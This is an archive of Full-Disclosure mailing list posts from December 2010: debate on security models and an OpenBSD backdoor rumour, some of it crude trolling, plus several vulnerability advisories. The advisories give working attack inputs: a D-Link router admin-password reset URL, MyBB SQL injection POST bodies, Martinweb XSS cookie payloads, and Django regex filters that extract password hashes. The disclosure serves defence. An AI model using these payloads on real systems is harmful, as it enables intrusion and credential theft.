Re: [Full-disclosure] Making Security Suck Less
Aha, welcome to the world. It is broken and will likely keep that way for long. So do what i do... Adapt, take a seat, wear a green hat if you can and forget about the rest. They will not understand, nor they want to. Besides we would see a load of net admins loosing their jobs / companies filling bankruptcy if the model changes so... You know what.. Bertrand Russell said once: Men who are unhappy, like men who sleep badly, are always proud of the fact. Sort like the old way of saying don't worry be happy! :D And I have serious doubts about that OSSTMM btw. On 12/16/10, Pete Herzog li...@isecom.org wrote: Hi, Now not everything about the old security model is bad. Personally, I really like the Zen feel of it. It's like raking the fine, white, beach sand into those concentric lines and around rocks and dead fish and stuff. It's very Zen. Then as the tide rises, the wind blows, and Frisbees get badly thrown you have to do it all over again in a very Zen way like this: Install. Harden. Configure. Patch. Scan. Patch again. Update. Re-configure. Scan. Patch again. Uninstall. Re-install. Configure. And then you do it all over again! With so much Zen practice it's hard not to become a Master of the security repeat cycle. But you know what else is Zen? NOT doing that. It's less stressful to maintain an existing balance between operations, limitations, and controls then running around and putting out fires. This is from my new article called, Making Security Suck Less you can read finished at: https://www.infosecisland.com/blogview/10304-Making-Security-Suck-Less.html There's some more, new articles reviewing the OSSTMM and the new security model at InfoSec Island here: https://www.infosecisland.com/osstmm.html Sincerely, -pete. -- Pete Herzog - Managing Director - p...@isecom.org ISECOM - Institute for Security and Open Methodologies www.isecom.org - www.osstmm.org www.hackerhighschool.org - www.badpeopleproject.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OpenBSD Smoking Gun
Hello Full Disclosure!!! Musntlive has warned you all about OpenB(ackdoored)S(oftwared)D(istrobution) for is some time and is all say musntlive is crazy. However is now when Theo discloses bug, is people like Paul I is like to smell scrotum Schmehl in silence. In trusting trust you is now see how OpenBSD via two developers allows for backdoor in IPSEC since is Theo and no one else audit those two clownskis. We now is have proof 1) OpenBSD is not as audited as they say 2) Is Fox Mulder say Is Trust No One 3) Paul Schmehl is not longer jumping on Theo scrotum bandwagon 4) Is now OpenBSD need new slogan: `No remote exploits in years - only backdoors` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] adobe.com important subdomain SQL injection again!
On Mon, 20 Dec 2010, Marsh Ray wrote: OK, so if sandboxing works, then why not just let devs build x86/x64 code in the first place? In the same category as Native Client or ActiveX. And get rid of the only good feature (or perhaps one of the few good features) of Flash (its ability to present the same content on various OSes and CPU architectures)? Remember chapter 1 of the textbook when it said The first rule of security is never try to retrofit security, _ever_!! and underlined it three times? I guess there must be a complementary rule in chapter 1 of software project management textbooks reading Do not ever take security into consideration when the system is being developed. Security is supposed to be an afterthought (and additional expense for the customer)! Always! In bright red blinking (*) 48pt letters. :( (*) An amazing feat in a printed book but the wonders of modern technology will make it possible soon. -- Pavel Kankovsky aka Peak / Jeremiah 9:21\ For death is come up into our MS Windows(tm)... \ 21st century edition / ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MS warns over zero-day IE bug
theregister quotes our ultra-mega-elite list: http://www.theregister.co.uk/2010/12/23/ms_zero_day/ Merry Christmas and all the best in the new year! -- joro ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] D-Link WBR-1310 Authentication Bypass Vulnerability
The CGI scripts in the WBR-1310 (firmware v.2.00) do not validate authentication credentials. Administrative settings can be changed by sending the appropriate HTTP request directly to a CGI script without authenticating to the device. The following request will change the administrative password to 'hacked' and enable remote administration on port 8080: http://192.168.0.1/tools_admin.cgi?admname=adminadmPass1=hackedadmPass2=hackedusername=useruserPass1=WDB8WvbXdHtZyM8userPass2=WDB8WvbXdHtZyM8hip1=*hport=8080hEnable=1 Even if remote administration is not enabled, any Web page that any internal user browses to can change the administrator password and enable remote administration via a hidden image tag embedded in the Web page. No Javascript required. Newer versions of the WBR-1310 firmware are not vulnerable, but since version 2.00 is the default firmware, most WBR-1310 routers are still running it. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: Microsoft Word LFO Parsing Double-Free Vulnerability
== Secunia Research 23/12/2010 - Microsoft Word LFO Parsing Double-Free Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Microsoft Word 2002 (10.6856.6858) SP3 NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System access Where: From remote == 3) Vendor's Description of Software Office Word ... provides editing and reviewing tools that help you create professional documents more easily than ever before. Product Link: http://office.microsoft.com/en-us/word/default.aspx == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Word, which can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused by a double-free error when processing LFO (List Format Override) records and can be exploited to corrupt memory via a specially crafted Word document. Successful exploitation may allow execution of arbitrary code. == 5) Solution Apply patches provided by MS10-079. == 6) Time Table 25/05/2010 - Vendor notified. 25/05/2010 - Vendor response. 22/12/2010 - Vendor informs that due to a mishap the vulnerability report fell off their radar. The vulnerability has in the meantime been fixed by MS10-079, which will be updated accordingly with proper credits. 23/12/2010 - Public disclosure. == 7) Credits Discovered by Alin Rad Pop, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-3217 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-76/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenBSD has Open Backdoored Software Distribution - admitted by Theo
On 12/23/2010 01:36 AM, mrx wrote: On 23/12/2010 00:00, Dan Kaminsky wrote: On Wed, Dec 22, 2010 at 3:47 PM, Dave Nett dave.n...@yahoo.com wrote: http://marc.info/?l=openbsd-techm=129296046123471w=2 Long mail which just admit has backdoor, poor Theo. (g) I believe that NETSEC was probably contracted to write backdoors as alleged. (h) If those were written, I don't believe they made it into our tree. They might have been deployed as their own product. You had only one more sentence to read! Just one! where would you start auditing the code? It's just too much. Actually, it is a very small part of the tree... I am aware that compilers can be coded to introduce features into binaries that are not in the actual source code itself. So with all due respect and possibly much ignorance on my part, what is a code audit going to achieve if one uses the shipped compiler to compile the source? Unless one codes ones own compiler can any binary be trusted? I am also aware that processors can have hidden features that make them execute a sightly different program that the one you expect to be executed. So, can we trust processors unless you make your own processor? For example think about the new Intel processors that are shipped with the AES-NI [1] instruction set. How difficult would be to governments and powerful people/companies to hide a trojan horse in this processors? And would you ever notice the existence of this hidden feature? [1] http://en.wikipedia.org/wiki/AES_instruction_set Would not reversing the compiled code lead to a proper insight? Are the compiled binaries that handle these crypto functions so complex that they cannot be reversed by a skilled assembly coder? I guess that such a coder would have to be an expert cryptographer too, or at least collaborate with one. My curiosity is genuine, I am trying to educate myself about such things. regards Dave ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Making Security Suck Less
So the world needs more people to just accept the problems? I disagree. We're trying to fix a broken model by presenting new steps, new methods, and new directions. By helping seek improvements is I sleep soundly at night. To each his own, I suppose. Your doubts are welcomed. Please submit your corrections and ideas for improvement. Sincerely, -pete. -- Pete Herzog - Managing Director - p...@isecom.org ISECOM - Institute for Security and Open Methodologies www.isecom.org - www.osstmm.org www.hackerhighschool.org - www.badpeopleproject.org On 12/23/2010 9:26 AM, wac wrote: Aha, welcome to the world. It is broken and will likely keep that way for long. So do what i do... Adapt, take a seat, wear a green hat if you can and forget about the rest. They will not understand, nor they want to. Besides we would see a load of net admins loosing their jobs / companies filling bankruptcy if the model changes so... You know what.. Bertrand Russell said once: Men who are unhappy, like men who sleep badly, are always proud of the fact. Sort like the old way of saying don't worry be happy! :D And I have serious doubts about that OSSTMM btw. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] www.eVuln.com : search - Non-persistent XSS in Social Share
www.eVuln.com advisory: search - Non-persistent XSS in Social Share Summary: http://evuln.com/vulns/169/summary.html Details: http://evuln.com/vulns/169/description.html ---Summary--- eVuln ID: EV0169 Software: Social Share Vendor: n/a Version: 2010-06-05 Critical Level: low Type: Cross Site Scripting Status: Unpatched. No reply from developer(s) PoC: Available Solution: Not available Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ ) Description It is possible to inject xss code into search parameter in search.php script. Parameter search is not properly sanitized before being used in HTML code. PoC/Exploit PoC code is available at: http://evuln.com/vulns/169/exploit.html -Solution-- Not available --Credit--- Vulnerability discovered by Aliaksandr Hartsuyeu http://evuln.com/code-analysis.html - source code analysis service ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenBSD Smoking Gun
Musntlive has warned you all about OpenB(ackdoored)S(oftwared)D(istrobution) for is some time and is all At risk of feeding the troll, this whole business has a positive side that no-one seems to have mentioned: 1 The seeding of evil developers into large software projects by The Man(tm) has now shifted from conspiracy theory to conspiracy in many peoples minds. 2 OpenBSD is the only project *we currently know of* that has been infiltrated. It seems highly likely that other projects/OS's will have been similarly treated. 3 As a result of being Open Source, the damage to OpenBSD's IPSec stack was pretty pathetic, and is now subject to scrutiny. In the end this will lead to the OpenBSD IPSec being the *only* trustworthy implementation. 4 A big questionmark now hangs over the security of closed-source crypto implementations. Seriously, can anyone really trust Windows IPSec after this incident? Do you trust your Apple AES-128 encrypted dmg files? Reg ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenBSD Smoking Gun
--On December 23, 2010 6:51:27 AM -0500 Григорий Братислава musntl...@gmail.com wrote: Hello Full Disclosure!!! Musntlive has warned you all about OpenB(ackdoored)S(oftwared)D(istrobution) for is some time and is all say musntlive is crazy. However is now when Theo discloses bug, is people like Paul I is like to smell scrotum Schmehl in silence. In trusting trust you is now see how OpenBSD via two developers allows for backdoor in IPSEC since is Theo and no one else audit those two clownskis. We now is have proof Yes, we have. In Musntliveland every bug is a backdoor and every programmer is a liar. Only Musntlive is speak truth since is Mustntlive only who speak out is against unholy OpenBecauseISayIsBackdoorYouMustBelieveSoftwareIsDistribution. Have a Merry Christmas, Mustntlive. You've livened up the holiday season, no doubt. Paul IsMaybeSmellScrotumSomehow Schmehl Is Musntlive son of former Pravda reporter? (Because wonder where is fountain of all knowledge and truth is come from. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenBSD Smoking Gun
may i have a *legal* posting email at this lovely domain fuckhotmail.com, please? i suspect i have some reputation points left :) (let me know if i am begging in vain, i had the impression i can't register it myself) On Thu, Dec 23, 2010 at 01:46:48PM +, Blank Reg wrote: Musntlive has warned you all about OpenB(ackdoored)S(oftwared)D(istrobution) for is some time and is all At risk of feeding the troll, this whole business has a positive side that no-one seems to have mentioned: 1 The seeding of evil developers into large software projects by The Man(tm) has now shifted from conspiracy theory to conspiracy in many peoples minds. 2 OpenBSD is the only project *we currently know of* that has been infiltrated. It seems highly likely that other projects/OS's will have been similarly treated. 3 As a result of being Open Source, the damage to OpenBSD's IPSec stack was pretty pathetic, and is now subject to scrutiny. In the end this will lead to the OpenBSD IPSec being the *only* trustworthy implementation. 4 A big questionmark now hangs over the security of closed-source crypto implementations. Seriously, can anyone really trust Windows IPSec after this incident? Do you trust your Apple AES-128 encrypted dmg files? Reg ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MyBB 1.6 = SQL Injection Vulnerability
= MyBB 1.6 = SQL Injection Vulnerability = 1. OVERVIEW Potential SQL Injection vulnerability was detected in MyBB. 2. APPLICATION DESCRIPTION MyBB is a free bulletin board system software package developed by the MyBB Group. It's supposed to be developed from XMB and DevBB bulletin board applications. 3. VULNERABILITY DESCRIPTION The keywords parameter was not properly sanitized in /private.php and /search.php which leads to SQL Injection vulnerability. Full exploitation possibility is probably mitigated by clean_keywords and clean_keywords_ft functions in inc/functions_search.php. 4. VERSIONS AFFECTED MyBB 1.6 and lower 5. PROOF-OF-CONCEPT/EXPLOIT = /search.php POST /mybb/search.php action=do_searchforums=2keywords='+or+'a'+'apostthread=1 = /private.php POST /mybb/private.php my_post_key=keywords='+or+'a'+'aquick_search=Search+PMsallbox=Check+Allfromfid=0fid=4jumpto=4action=do_stuff 6. SOLUTION Upgrade to 1.6.1 7. VENDOR MyBB Development Team http://www.mybb.com/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-12-09: notified vendor 2010-12-15: vendor released fixed version 2010-12-24: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection About MyBB: http://www.mybb.com/about/mybb #yehg [2010-12-24] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Django admin list filter data extraction / leakage
ADVISORY INFORMATION: Advisory ID: NGENUITY-2010-009 Date discovered: 8.28.2010 Date published: 12.22.2010 SOFTWARE AFFECTED: “Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.” [1] The admin interface of the Django web framework can be abused to extract information, such as user password hashes via list filters. Version 1.1.2, 1.2.3 and before are affected. The advisory from the Django dev team can be found here [2]. TECHNICAL DETAILS: The principle behind the vulnerability is similar to blind sql injection, but abuses a feature of t We can use list filters to follow foreign keys into models and data our user should not normally have access to. Using regular expressions gives us a lot of flexibility to work our way down the value we want to extract. For a model that has a created_by field that points to a User object we could extract the password hash using a request similar to the below. http://example.com/admin/testapp/testmodel/?created_by__password__regex=^sha1\$[0-9]$ http://example.com/admin/testapp/testmodel/?created_by__password__regex=^sha1\$[a-f]$ Authentication as a staff user in the admin is required to exploit this vulnerability. Here's looking at you CMS apps! CREDIT: This vulnerability was discovered by Adam Baldwin mailto:adam_bald...@ngenuity-is.commailto:adam_bald...@ngenuity-is.com REFERENCES: [1] - http://www.djangoproject.com [2] - http://www.djangoproject.com/weblog/2010/dec/22/security/ [3] - http://ngenuity-is.com/advisories/2010/dec/22/information-leakage-in-django-administrative-inter/ [4] - http://evilpacket.net/2010/dec/22/information-leakage-django-administrative-interfac/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in Martinweb CMS
Hello Full-Disclosure! I want to warn you about vulnerabilities in Martinweb CMS. It's Ukrainian commercial CMS (which is used particularly at web sites of security companies and banks). - Affected products: - Vulnerable are possibly all versions of Martinweb CMS. -- Details: -- XSS (WASC-08): http://site/sitesearch/page--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.html http://site/index.php?pages='language=%3Cscript%3Ealert(document.cookie)%3C/script%3E XSS (with MouseOverJacking) (WASC-08): http://site/index.php?op=searchsearch='style='width:100%;height:100%;display:block;position:absolute;top:0px;left:0px'onMouseOver='alert(document.cookie)' http://site/index.php?op=searchpages=1'style='width:100%;height:100%;display:block;position:absolute;top:0px;left:0px'onMouseOver='alert(document.cookie)' SQL DB Structure Extraction (WASC-13): http://site/index.php?pages=’ Timeline: 2010.10.11 - announced at my site. 2010.10.12 - informed developers. 2010.10.13 - additionally informed developers (because official e-mail was forgotten and overfull). 2010.12.22 - disclosed at my site. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/4594/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2010:259 ] pidgin
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:259 http://www.mandriva.com/security/ ___ Package : pidgin Date: December 23, 2010 Affected: 2009.0, 2010.0, 2010.1 ___ Problem Description: A null pointer dereference due to receiving a short packet for a direct connection in the MSN code could potentially cause a denial of service. Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149products_id=490 This update provides pidgin 2.7.8 that has been patched to address this flaw. ___ References: http://pidgin.im/news/security/ ___ Updated Packages: Mandriva Linux 2009.0: c268cfea5df24d94a1fce4ed9e9c8e2b 2009.0/i586/finch-2.7.8-0.2mdv2009.0.i586.rpm 1b83a79a24630273cb0fd6de36063d01 2009.0/i586/libfinch0-2.7.8-0.2mdv2009.0.i586.rpm 5ac73ba5e6b8f422fdd2dc8216112072 2009.0/i586/libpurple0-2.7.8-0.2mdv2009.0.i586.rpm 297f0cdd8b87c5cd4909c3c6fbe1ac31 2009.0/i586/libpurple-devel-2.7.8-0.2mdv2009.0.i586.rpm e57619f18b1e859ee22631c2f393be6b 2009.0/i586/pidgin-2.7.8-0.2mdv2009.0.i586.rpm 0b317674aa0aa78c7b2601ebd66ef886 2009.0/i586/pidgin-bonjour-2.7.8-0.2mdv2009.0.i586.rpm e2e068ed1acc961c256fb5fb3a6bc4a7 2009.0/i586/pidgin-client-2.7.8-0.2mdv2009.0.i586.rpm 409b5693a3d350d54a6b1b07dcfe4e88 2009.0/i586/pidgin-gevolution-2.7.8-0.2mdv2009.0.i586.rpm 64d503c98a0048ecae1f6959e1902c7b 2009.0/i586/pidgin-i18n-2.7.8-0.2mdv2009.0.i586.rpm 2fd2ea0ba84497c5dd778b8a4996a446 2009.0/i586/pidgin-meanwhile-2.7.8-0.2mdv2009.0.i586.rpm 195a0fca668c2cb8b049aa2f878d6b99 2009.0/i586/pidgin-perl-2.7.8-0.2mdv2009.0.i586.rpm eab1d0f42237cb2de2bf0dcdb60c01f5 2009.0/i586/pidgin-plugins-2.7.8-0.2mdv2009.0.i586.rpm df33bb5b86bd903aa82e31b3ae2c7405 2009.0/i586/pidgin-silc-2.7.8-0.2mdv2009.0.i586.rpm 356ff080f65bc0e6dbff9f3292ab35ed 2009.0/i586/pidgin-tcl-2.7.8-0.2mdv2009.0.i586.rpm 6fe3a267b0c994c98252defc0229d73f 2009.0/SRPMS/pidgin-2.7.8-0.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 07cbd9d2d40cb069ea315cb55dc1d5b9 2009.0/x86_64/finch-2.7.8-0.2mdv2009.0.x86_64.rpm 2759f7a76653f15d33e23828041e775d 2009.0/x86_64/lib64finch0-2.7.8-0.2mdv2009.0.x86_64.rpm f120e2602535fdd5736a3f0051d97648 2009.0/x86_64/lib64purple0-2.7.8-0.2mdv2009.0.x86_64.rpm c477958fdb03426af9cd29a7da91373d 2009.0/x86_64/lib64purple-devel-2.7.8-0.2mdv2009.0.x86_64.rpm e7d575b135dc40ffe447e85958e89f0f 2009.0/x86_64/pidgin-2.7.8-0.2mdv2009.0.x86_64.rpm 0ba47012d00f1682c00fd9b87072129e 2009.0/x86_64/pidgin-bonjour-2.7.8-0.2mdv2009.0.x86_64.rpm 55eeaf467e82d003abf5de61b65f5ae0 2009.0/x86_64/pidgin-client-2.7.8-0.2mdv2009.0.x86_64.rpm 4478c7c5301da7fcb78c989eb18d9497 2009.0/x86_64/pidgin-gevolution-2.7.8-0.2mdv2009.0.x86_64.rpm 448777d63afc82270d18b2a99fa5294a 2009.0/x86_64/pidgin-i18n-2.7.8-0.2mdv2009.0.x86_64.rpm 51080c450cb241977de0a5c94564c368 2009.0/x86_64/pidgin-meanwhile-2.7.8-0.2mdv2009.0.x86_64.rpm 7e8cb3ebcd3b71134ee00761766d6407 2009.0/x86_64/pidgin-perl-2.7.8-0.2mdv2009.0.x86_64.rpm 2f06b7d807934fdb4a3ada32e7e1dcc7 2009.0/x86_64/pidgin-plugins-2.7.8-0.2mdv2009.0.x86_64.rpm 123067587dab1f25871be80313bba3c5 2009.0/x86_64/pidgin-silc-2.7.8-0.2mdv2009.0.x86_64.rpm d7d55cb2e4ca769ea94a3a44690bc7d1 2009.0/x86_64/pidgin-tcl-2.7.8-0.2mdv2009.0.x86_64.rpm 6fe3a267b0c994c98252defc0229d73f 2009.0/SRPMS/pidgin-2.7.8-0.2mdv2009.0.src.rpm Mandriva Linux 2010.0: 9c7d51a088df133d4caa4b8059ba821a 2010.0/i586/finch-2.7.8-0.2mdv2010.0.i586.rpm 8dedd9ee7739e0ed384df88f63501412 2010.0/i586/libfinch0-2.7.8-0.2mdv2010.0.i586.rpm f67e74064a653bb9a2812eb78a307cff 2010.0/i586/libpurple0-2.7.8-0.2mdv2010.0.i586.rpm 3483a4e99e028e5b09ea0165b176c037 2010.0/i586/libpurple-devel-2.7.8-0.2mdv2010.0.i586.rpm 5117c80ad19c56b39280f7c3dfdd1872 2010.0/i586/pidgin-2.7.8-0.2mdv2010.0.i586.rpm dc33975bc058eb24168e029967889c5b 2010.0/i586/pidgin-bonjour-2.7.8-0.2mdv2010.0.i586.rpm b9104754d162f03f083da877997c9150 2010.0/i586/pidgin-client-2.7.8-0.2mdv2010.0.i586.rpm 1013da7e359b8cc576ebea1aebbfcce6 2010.0/i586/pidgin-i18n-2.7.8-0.2mdv2010.0.i586.rpm a686ada4efeea86b8bff3b1a861084f3 2010.0/i586/pidgin-meanwhile-2.7.8-0.2mdv2010.0.i586.rpm 361dc60eeeabf18fe147aa636c94c04f 2010.0/i586/pidgin-perl-2.7.8-0.2mdv2010.0.i586.rpm a001335057f3aebd6733378469d58871 2010.0/i586/pidgin-plugins-2.7.8-0.2mdv2010.0.i586.rpm 0cdc172b5dc0b62f0468c4ed00a4141d 2010.0/i586/pidgin-silc-2.7.8-0.2mdv2010.0.i586.rpm 6d09b87891d3b38b4b7a70a6a69261d2
[Full-disclosure] How long was the twitter outage?
How long was the twitter outage from yesterday coinciding with the other outage? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [IMF 2011] 2nd Call - Deadline Extended
Dear all, the deadline for the submission of papers to IMF 2011 has been extended. Accepted papers will be published in IEEE Computer Society's Conference Proceedings Series and be available in the IEEE online Digital Library. Please excuse possible cross-postings. CALL FOR PAPERS IMF 2011 6th International Conference on IT Security Incident Management IT Forensics May 10th - 12th, 2011 Stuttgart, Germany DEADLINE EXTENSION! PAPER SUBMISSION The deadline for paper submissions has been extended to January 17th, 2011. Notification of acceptance will be sent on January 31st. Camera ready paper copies must be submitted until Febuary 7th, 2011. Papers can be submitted via the page found at: http://www.imf-conference.org/imf2011/submission.html Accepted papers will be published in IEEE Computer Society's Conference Proceedings Series and be available in the IEEE online Digital Library. Conference Background - IT-Security has become a steady concern for all entities operating IT-Systems. These include enterprises, governmental and non-governmental organizations, as well as individuals. Yet, despite high-end precautionary measures taken, not every attack or security mishap can be prevented and hence incidents will go on happening. In such cases forensic capabilities in investigating incidents in both technical and legal aspects are vital to understand their issue and feed back the knowledge gained into the security process. Documenting the measures taken to prevent or minimize damage to own or external IT infrastructure provides legal rear cover if an involved party decides to start proceedings. In a possible lawsuit emerging from such an incident, its treatment in a forensically proper way is crucial to be able to possibly claim for damages or prevent from being threatened by claims of third parties. Thus, capable incident response and forensic procedures have become an essential part of IT infrastructure operations. In law enforcement IT forensics is an important branch and its significance constantly increases since IT has become an essential part in almost every aspect of daily life. IT systems produce traces and evidence in many ways that play a more and more relevant role in resolving cases. Conference Goals IMF's intent is to gather experts from throughout the world in order to present and discuss recent technical and methodical advances in the fields of IT security incident response and management and IT forensics. The conference provides a platform for collaboration and exchange of ideas between industry (both as users and solution providers), academia, law-enforcement and other government bodies. Conference Topics -- The scope of IMF 2011 is broad and includes, but is not limited to the following areas: IT Security Incident Response - Procedures and Methods of Incident Response - Formats and Standardization for Incident Response - Tools Supporting Incident Response - Incident Analysis - CERTs/CSIRTs - Sources of Information, Information Exchange, Communities - Dealing with Vulnerabilities (Vulnerability Response) - Monitoring and Early Warning - Education and Training - Organizations - Legal and Enterprise Aspects (Jurisdiction, Applicable Laws and Regulations) IT Forensics - Trends and Challenges in IT Forensics - Application of forensic techniques in new areas - Techniques, Tools in Procedures IT Forensics -Methods for the Gathering, Handling, Processing and Analysis of Digital Evidence - Evidence Protection in IT Environments - Standardization in IT Forensics - Education and Training - Organizations - Legal and Enterprise Aspects (Jurisdiction, Applicable Laws and Regulations) Submission Details -- IMF invites to submit full papers, presenting novel and mature research results as well as practice papers, describing best practices, case studies or lessons learned of up to 20 pages. Proposals for workshops, discussions and presentations on practical methods and challenges are also welcome. All submissions must be written in English (see below), and either in postscript or PDF format. Authors of accepted papers must ensure that their papers will be presented at the conference. Submitted full papers must not substantially overlap papers that have been published elsewhere or that are simultaneously submitted to a journal or a conference with proceedings. All submissions will be reviewed by the program committee and papers accepted to be presented at the conference will be included in the conference proceedings. Details on the electronic submission procedure as well
Re: [Full-disclosure] How long was the twitter outage?
The site was not down for all users. A small number of users were affected by the failure of specific database node. Please see our status blog for details. http://status.twitter.com -j On Thu, Dec 23, 2010 at 12:23 PM, Georgi Guninski gunin...@guninski.comwrote: How long was the twitter outage from yesterday coinciding with the other outage? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How long was the twitter outage?
More like Justin Beiber's nodes failed On 12/23/2010 04:39 PM, John Adams wrote: A small number of users were affected by the failure of specific database node. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How long was the twitter outage?
I tried to check your status blog, but the site is down for me. Just sayin'. t From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of John Adams Sent: Thursday, December 23, 2010 1:40 PM To: Georgi Guninski Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] How long was the twitter outage? The site was not down for all users. A small number of users were affected by the failure of specific database node. Please see our status blog for details. http://status.twitter.com -j On Thu, Dec 23, 2010 at 12:23 PM, Georgi Guninski gunin...@guninski.commailto:gunin...@guninski.com wrote: How long was the twitter outage from yesterday coinciding with the other outage? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How long was the twitter outage?
Because Georgi has reputation points left. He can say whatever he wants. :) From: Cal Leeming [Simplicity Media Ltd] [mailto:cal.leem...@simplicitymedialtd.co.uk] Sent: Thursday, December 23, 2010 3:13 PM To: Thor (Hammer of God) Cc: John Adams; Georgi Guninski; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] How long was the twitter outage? No doubt someone will bitch at me for asking this but, why on earth is this being discussed on full-disclosure? lol. On Thu, Dec 23, 2010 at 10:46 PM, Thor (Hammer of God) t...@hammerofgod.commailto:t...@hammerofgod.com wrote: I tried to check your status blog, but the site is down for me. Just sayin'. t From: full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of John Adams Sent: Thursday, December 23, 2010 1:40 PM To: Georgi Guninski Cc: full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] How long was the twitter outage? The site was not down for all users. A small number of users were affected by the failure of specific database node. Please see our status blog for details. 